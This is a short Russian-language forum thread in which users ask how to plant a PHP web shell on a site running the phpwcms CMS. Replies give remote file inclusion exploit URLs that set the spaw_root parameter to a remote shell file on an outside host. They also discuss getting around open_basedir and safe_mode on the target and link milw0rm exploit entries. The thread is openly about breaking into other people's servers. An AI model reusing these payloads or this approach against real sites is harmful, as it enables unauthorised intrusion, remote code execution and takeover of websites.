Кто знает,как залить пхпшелл в эту CMSку?))

версия ?

RFI
http://www.site.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.evalsite.com/shell.php?

Хз как её узнать,но там стоит open_basedir и safe_mod =_=.Как раз этот метод пробывал недавно,и бэйздира меня спалила)( Версия РНР - 4.3.10-22

Can`t include external file пишет =_=.А стоит allow_url_fopen() =_=

Так ищи локальный инклуд, удаленный вообще редко где прокатывает

http://milw0rm.com/exploits/2758
http://milw0rm.com/exploits/2163

Придётся... )

http://site.com/nclude/inc_ext/spaw/dialogs/img.php

Вывелось Image Properties (http://milw0rm.com/exploits/2163)

К чему это ? spaw_root переменной вообще нету )))


как тут:

PoC:
http://victim-site/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat?